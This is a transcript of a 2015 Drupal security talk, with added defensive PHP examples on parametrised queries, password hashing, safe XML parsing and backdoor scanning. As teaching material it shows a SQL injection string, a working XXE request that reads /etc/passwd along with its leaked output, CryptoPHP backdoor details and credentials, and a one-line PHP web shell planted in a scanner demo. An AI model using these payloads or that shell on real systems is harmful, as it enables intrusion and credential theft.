Page 1: Drupal, lessons learnt from real world security incidents

Dr. Pedram Hayati, Partner and Security Consultant, elttam

DrupalGlamp, Sydney, 5 September 2015

Page 2: Drupal security, looking from an attacker angle

Targeting the software
• Publicly known weaknesses or 0days
• Drupal core or modules

Targeting a user
• Social engineering

Targeting a developer
• Watering hole attacks

Page 3: What a security tester should know!

Security is not a high priority
• Sad but true
• If software is not usable, it does not matter whether it is secure or not
• The security tester is not the only stakeholder

Learn the terminology
• "Defect" and "bug" instead of "0day" and "vulnerability"
• "Enhancement" instead of "best practice recommendation"

Explain "how to fix", not "how to break"
• Security testers get excited about showing how to hack the planet
• Developers care about how to fix things effectively
• One size does not fit all
• Reports spend a lot on issue detail but little on the remediation plan

Show some respect!
• No bashing developers or being negative toward them

Page 4: Targeting software

Page 5: Pre-auth SQL injection in Drupal core

15 October 2014
• A major SQL injection vulnerability within Drupal core: CVE-2014-3704
• Likelihood: pre-auth, so reachable by any unauthenticated request
• Impact: privilege escalation, code execution
• You are likely compromised if you had not patched your Drupal within 7 hours of this issue being announced
• https://www.drupal.org/node/2357241

Page 6: Hardening - generic

Remember, Drupal has a higher risk profile.
• Subscribe to security feeds
• Have backups and make sure they work (test the restore, not just the backup job)
• Be ready: prepare your (basic) incident response strategy
• References
  Drupal security feed: https://www.drupal.org/security/psa
  Security team contact: https://security.drupal.org/team-members
  Incident response plan: http://www.comptechdoc.org/independent/security/policies/incident-response-plan.html
  https://twitter.com/drupalsecurity

Page 7: Hardening - secure coding

Principle #1: Defend as close as possible to the destination
• Use parametrised queries: pass values through db_query() placeholders (and db_rewrite_sql() where you use it) and never concatenate data into the query string
• Use Drupal's check functions for output filtering: check_plain(), check_markup(), check_url() and filter_xss()
• Client-side (JavaScript) validation is not validation: the attacker sends requests straight to the server

Principle #2: It is not just input and output handling
• Understand Cross-Site Request Forgery (CSRF)
• Use the Form API, which adds and verifies the per-user form token for you

Principle #3: File upload is difficult to secure
• Avoid file upload where possible
• Re-produce the file (e.g. re-encode images with the GD library) instead of storing what was uploaded
• Check the MIME type, the magic numbers and the bytes themselves, not just the file name
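As an added example (not from the slides or from Drupal's code base), the same lookup is written below the injectable way and with a bound parameter, and run through plain PDO against an in-memory SQLite database so it works without Drupal. Drupal 7's db_query() takes the same :name placeholders (shown in a comment), and check_plain() is htmlspecialchars() with ENT_QUOTES and UTF-8, which is what renderName() does here. The attacker input is constructed. Assumes PHP 7.4+ with the pdo_sqlite extension.

```php
<?php
// Added example, not Drupal's own code: the same query written the injectable
// way and the parametrised way, plus context-correct output escaping.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, mail TEXT)');
$db->exec("INSERT INTO users (name, mail) VALUES ('alice', 'alice@example.test'), ('bob', 'bob@example.test')");

// Vulnerable: attacker-controlled text is concatenated into the SQL itself.
function findUserUnsafe(PDO $db, string $name): array {
    $sql = "SELECT name, mail FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value travels as a bound parameter and can never become SQL.
// Drupal 7 equivalent:
//   db_query('SELECT name, mail FROM {users} WHERE name = :name', array(':name' => $name));
function findUserSafe(PDO $db, string $name): array {
    $stmt = $db->prepare('SELECT name, mail FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Output filtering: escape for the context the data lands in (HTML text here).
// This is what Drupal 7's check_plain() does.
function renderName(string $name): string {
    return '<td>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// --- demo with constructed attacker input ---
$payload = "x' OR '1'='1";

$leaked = findUserUnsafe($db, $payload);   // the OR clause returns the whole table
$safe   = findUserSafe($db, $payload);     // looks for a user literally named "x' OR '1'='1"
printf("unsafe query returned %d row(s), safe query returned %d row(s)\n", count($leaked), count($safe));

echo renderName('<script>alert(1)</script>'), "\n";
```

The concatenated version matches every row because the quote in the payload closes the string literal; the bound version compares the whole payload as one value and matches nothing. The same placeholder discipline applies to every db_query() call, including ones built from "trusted" values such as the URL path.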

Page 8: Hardening - secure coding (continued)

Principle #4: Remember that hash algorithms are ever evolving
• MD5 = plaintext; SHA-1 ~= plaintext (fast, unsalted hashes are cracked offline at GPU speed)
• Use a slow hashing algorithm for passwords, in order of preference: scrypt -> bcrypt (work factor 15) -> PBKDF2 with SHA-256
• Salt the hash
• Use a Hash-based Message Authentication Code (HMAC) when you need integrity or authenticity, not a bare hash
• drupal_hmac_base64() uses HMAC-SHA256, which is fine as a MAC, but SHA-256 is a fast hash and is not what you want for password storage
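An added example, not from the slides or from Drupal core, of the points above in plain PHP (7.4+): a fast unsalted hash beside bcrypt via password_hash(), and an HMAC-SHA256 token verified with hash_equals(), which is the kind of job an HMAC is for. The password, session id, form id and secret key are constructed values. Drupal 7's own user_hash_password() already applies a salted, iterated SHA-512, so this is for code you write yourself, not a replacement for core's password handling.

```php
<?php
// Added example, not Drupal code: slow salted password hashing versus a fast
// hash, and an HMAC-SHA256 token compared in constant time.
declare(strict_types=1);

// Weak: fast and unsalted. Identical passwords give identical hashes and are
// guessed offline at billions of attempts per second.
function weakHash(string $password): string {
    return md5($password);
}

// Slow and salted: bcrypt through password_hash(). PHP generates the random
// salt and embeds it in the returned string, so nothing else needs storing.
// cost is the work-factor exponent (2^cost rounds); the slides suggest 15 for
// production, 12 is used here only so the demo finishes in well under a second.
function storePassword(string $password, int $cost = 12): string {
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => $cost]);
}

function checkPassword(string $password, string $stored): bool {
    return password_verify($password, $stored);
}

// HMAC-SHA256: the right tool for authenticity of data you hand out (form
// tokens, signed cookies). Fast hash plus secret key; never for passwords.
function issueToken(string $key, string $sessionId, string $formId): string {
    return hash_hmac('sha256', $sessionId . '|' . $formId, $key);
}

function verifyToken(string $key, string $sessionId, string $formId, string $token): bool {
    // hash_equals() keeps the comparison time independent of where bytes differ.
    return hash_equals(issueToken($key, $sessionId, $formId), $token);
}

// --- demo with constructed values ---
$pw = 'correct horse battery staple';

echo "md5 twice:    ", weakHash($pw) === weakHash($pw) ? "same (no salt)\n" : "different\n";
$h1 = storePassword($pw);
$h2 = storePassword($pw);
echo "bcrypt twice: ", $h1 === $h2 ? "same\n" : "different (fresh salt each time)\n";
echo "verify good:  ", checkPassword($pw, $h1) ? "ok\n" : "fail\n";
echo "verify bad:   ", checkPassword('wrong', $h1) ? "ok\n" : "fail\n";

$key = random_bytes(32);                              // constructed server-side secret
$tok = issueToken($key, 'sess-1234', 'contact_form');
echo "token valid:  ", verifyToken($key, 'sess-1234', 'contact_form', $tok) ? "yes\n" : "no\n";
echo "token forged: ", verifyToken($key, 'sess-9999', 'contact_form', $tok) ? "yes\n" : "no\n";
```

password_hash() also lets you raise the cost later and detect old hashes with password_needs_rehash() at login time, which is how "ever evolving" is handled in practice without a forced reset.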

Page 9: Pre-auth XXE

24 March 2015
• XML External Entity (XXE): the XML document references a user-controllable field that includes an external entity
• A weakness within the Services module
• Allows arbitrary file read (e.g. settings.php, which holds the database credentials)
• Found by Renaud Dubourguais from Synacktiv, published 24 March 2015
• http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf

Page 10: Pre-auth XXE: sample payload

    POST /drupal-7.28/?q=test/node HTTP/1.1
    [...]
    <!DOCTYPE root [<!ENTITY % evil SYSTEM "file:///etc/passwd">%evil;]>
    <xml>
        <test>test</test>
    </xml>

Page 11: Pre-auth XXE: response

    <?xml version="1.0" encoding="utf-8"?>
    <result>Line 5, Col 9: failed to load external entity &amp;quot;file://W00Tcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCg==W00T&amp;quot;Line 9, Col 27: Opening and ending tag mismatch: test line 9 and type</result>

Note where the leak happens: the parser tried to fetch a URL that had the base64-encoded file content expanded into it, failed, and the application echoed the failing URL back to the client inside the error message. Verbose parser errors in responses are part of the bug.

Page 12: Pre-auth XXE: response (base64 decoded)

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Page 13: How to fix it?

• Input validation?
• Output validation or rendering?
• Business logic: access control

The parser must not resolve external entities at all, the error text must not be reflected to the client, and an endpoint that parses attacker-supplied XML should not be reachable before authentication.
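An added example, not from the slides, the Services module or Synacktiv's advisory: a loader for untrusted XML bodies that applies the three layers above in plain PHP/libxml (7.4+, no Drupal), run against the payload from the previous slides and two constructed bodies. Function and class names are this example's own.

```php
<?php
// Added example, not Services module code: parse an XML request body without
// ever resolving entities, and without leaking parser errors to the client.
declare(strict_types=1);

final class XmlRejected extends RuntimeException {}

function parseUntrustedXml(string $body): DOMDocument {
    // 1. A request body never needs a DTD. Refusing any DOCTYPE removes both
    //    external (SYSTEM/PUBLIC) and internal entity declarations in one go.
    if (preg_match('/<!DOCTYPE/i', $body)) {
        throw new XmlRejected('DOCTYPE not allowed');
    }
    // 2. Belt and braces for the parser itself: no entity substitution (do not
    //    pass LIBXML_NOENT), no DTD loading (LIBXML_DTDLOAD absent), no network
    //    (LIBXML_NONET). Before PHP 8 the external entity loader was enabled by
    //    default and has to be switched off explicitly.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    try {
        $doc = new DOMDocument();
        $doc->resolveExternals   = false;
        $doc->substituteEntities = false;
        if (!$doc->loadXML($body, LIBXML_NONET)) {
            // 3. Keep libxml's messages out of the response: the slide above
            //    shows the file contents riding back inside the error string.
            $msgs = array_map(fn (LibXMLError $e) => trim($e->message), libxml_get_errors());
            error_log('XML rejected: ' . implode('; ', $msgs));
            throw new XmlRejected('malformed XML');
        }
        return $doc;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prev);
    }
}

// --- constructed inputs: the slide's payload, a benign body, a broken body ---
$inputs = [
    'xxe'    => '<!DOCTYPE root [<!ENTITY % evil SYSTEM "file:///etc/passwd">%evil;]>'
              . '<xml><test>test</test></xml>',
    'benign' => '<xml><test>test</test></xml>',
    'broken' => '<xml><test>test</type></xml>',
];
foreach ($inputs as $label => $body) {
    try {
        $doc = parseUntrustedXml($body);
        printf("%-7s accepted, root element <%s>\n", $label, $doc->documentElement->tagName);
    } catch (XmlRejected $e) {
        printf("%-7s rejected: %s\n", $label, $e->getMessage());
    }
}
```

The caller only ever sees "DOCTYPE not allowed" or "malformed XML"; the real parser diagnostics go to the server log. The access-control half of the fix (not exposing the parser pre-auth) belongs in the endpoint's permission check, not in this function.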

Page 14: Targeting user

Page 15: CryptoPHP

20 November 2014, reported by Fox-IT
• Large number of backdoored CMS installations, including Drupal, Joomla and WordPress
• Used for blackhat SEO

Page 16: CryptoPHP

C2 communication

    {
      "servers": ["127.0.0.1", "127.0.0.2"],
      "eval":    ["print(system('ls -la'));", "phpinfo();"],
      "echo":    ["strings to be echoed", "etc."]
    }

Mail communication
• For failover

Manual control
• http://127.0.0.1/index.php?<serverkey>=reset

Encrypted communication

Adds a new admin account for future access
• Username: system[0-9]*
• Password: FUHIAsbdiugAS

Page 17: CryptoPHP

Spread through
• Pirated themes
• Commercial plugins offered for free
• Nulled scripts

Page 18: Remediation

Look inside your theme (and module) directories for:

    <?php include('images/social.png'); ?>

Check the authenticity of your packages
• Use legitimate sources (the drupal.org project page, not a "free" copy of a commercial theme)

Check the integrity of the downloaded packages
• Checksum: record the digest of what you installed and compare against it later

More info: https://foxitsecurity.files.wordpress.com/2014/11/cryptophp-whitepaper-foxsrt-v4.pdf
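An added example, not from the Fox-IT report or the slides, that does both checks above in plain PHP (7.4+): it walks a theme/module tree for PHP that includes an "image" (the slide shows social.png; the wider extension list is this example's generalisation) and for image files that actually start with a PHP tag, and it re-verifies a SHA-256 manifest taken from the packages as installed. It runs on a constructed temporary tree; on a real site you would point scanTree() and verifyManifest() at sites/all/themes and sites/all/modules. Function and constant names are this example's own.

```php
<?php
// Added example, not Fox-IT or Drupal code: CryptoPHP-style backdoor scan plus
// manifest-based integrity check over a theme/module tree.
declare(strict_types=1);

// include/require(_once) whose target has an image or font extension.
const BACKDOOR_INCLUDE =
    '/\b(?:include|require)(?:_once)?\s*\(?\s*[\'"][^\'"]+\.(?:png|jpe?g|gif|ico|svg|ttf|woff2?)[\'"]/i';

const CODE_EXT  = ['php', 'inc', 'module', 'install', 'theme', 'engine'];
const IMAGE_EXT = ['png', 'jpg', 'jpeg', 'gif', 'ico'];

function scanTree(string $root): array {
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile()) continue;
        $path = $file->getPathname();
        $ext  = strtolower($file->getExtension());
        $data = (string) file_get_contents($path);
        if (in_array($ext, CODE_EXT, true) && preg_match(BACKDOOR_INCLUDE, $data, $m)) {
            $hits[] = "$path: $m[0]";
        }
        // The "picture" itself is the payload when it opens with a PHP tag.
        if (in_array($ext, IMAGE_EXT, true) && strncmp(ltrim($data), '<?php', 5) === 0) {
            $hits[] = "$path: image file starts with <?php";
        }
    }
    sort($hits);
    return $hits;
}

// Manifest lines in sha256sum style: "<hex digest>  <path relative to $root>".
function buildManifest(string $root, array $relPaths): string {
    $out = '';
    foreach ($relPaths as $rel) {
        $out .= hash_file('sha256', "$root/$rel") . "  $rel\n";
    }
    return $out;
}

function verifyManifest(string $root, string $manifest): array {
    $bad = [];
    foreach (preg_split('/\R/', trim($manifest)) as $line) {
        if (!preg_match('/^([0-9a-f]{64})\s+\*?(.+)$/', $line, $m)) continue;
        [, $expected, $rel] = $m;
        $path   = "$root/$rel";
        $actual = is_file($path) ? hash_file('sha256', $path) : str_repeat('0', 64);
        if (!hash_equals($expected, $actual)) {
            $bad[] = is_file($path) ? "$rel: modified" : "$rel: missing";
        }
    }
    return $bad;
}

// --- demo on a constructed tree ---
$root = sys_get_temp_dir() . '/cryptophp-demo-' . bin2hex(random_bytes(4));
mkdir("$root/images", 0700, true);
file_put_contents("$root/template.php", "<?php\n// theme helpers\n");
file_put_contents("$root/clean.module", "<?php\nfunction clean_menu() { return array(); }\n");
$manifest = buildManifest($root, ['template.php', 'clean.module']);   // taken at install time

// Later: a "free" copy of the theme replaces template.php and drops the payload.
file_put_contents("$root/template.php", "<?php\n// theme helpers\ninclude('images/social.png');\n");
file_put_contents("$root/images/social.png", "<?php eval(base64_decode(\$_POST['c']));");

foreach (scanTree($root) as $hit)                echo "SUSPICIOUS  $hit\n";
foreach (verifyManifest($root, $manifest) as $b) echo "INTEGRITY   $b\n";

// cleanup of the constructed tree
foreach (new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST) as $f) {
    $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
}
rmdir($root);
```

The pattern scan finds the known indicator; the manifest finds anything changed since install, including backdoors that do not match any signature. Store the manifest off the web server, since an attacker with write access to the docroot can regenerate it.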

Page 19: Targeting developer

Page 20: Watering hole attack

An attack strategy targeted toward user groups
• Developers, operations, normal users

Commonly a website used by the victim group is infected; members of the group are eventually infected through that website.

November 2014
• Forbes.com compromised
• 0days for IE and Flash
• Targets: US defence, financial services

Page 21: Awareness

Developers
• Typically have highly privileged access on the local machine or to network services
• Increase the security of your browser
  Addon: NoScript
  Addon: Web of Trust (WOT)
  Use a different profile or browser for surfing the web and for doing work
  Have a read about the capabilities of the BeEF framework: http://beefproject.com/
• Increase the security of your email client
  Increase the security settings of Outlook
  Default all emails to plain text
  Keep personal and work email in separate email clients, even on your smart phone
• Use trusted sources
• Verify the integrity of downloaded files

Page 22: Unhack my website

1. Make a (forensic) copy of your entire server
   1. Do not change anything
   2. Get a snapshot of your cloud/VM instance
2. Take your website offline
3. Notify users and stakeholders
4. Start the investigation process
   1. It is likely automated: search for known signatures
   2. Check the integrity of all files
      1. Drupal Hacked! module: https://www.drupal.org/project/hacked
   3. Use available tools
      1. Sort files and other data based on time
      2. Create a timeline
   4. Call for help
5. Rebuild your website
   1. Restore an older (known-clean) snapshot
   2. Apply all patches before bringing it back online

Page 23: Bonus

An actual attack can come days later
• There are different threat actors behind attacks: https://blog.smarthoneypot.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/
• Go back in time when building the timeline

Malware names are randomised
• Look into outbound network connections
• tcpdump

Malware is renamed to look like legitimate executables
• Your best friends: lsof, strace, netstat

Page 24: Wrap up

My point was to provide you with awareness. Attackers find the easiest and most effective way to target:
• Software
• Users
• Developers

Keep up to date with the Drupal security feed. Get yourself engaged in local security communities.

Page 25: Thank you

To receive recommendations on protecting your Drupal, reach me at:
Email: [email protected]
Twitter: pi3ch
Web: https://elttam.com.au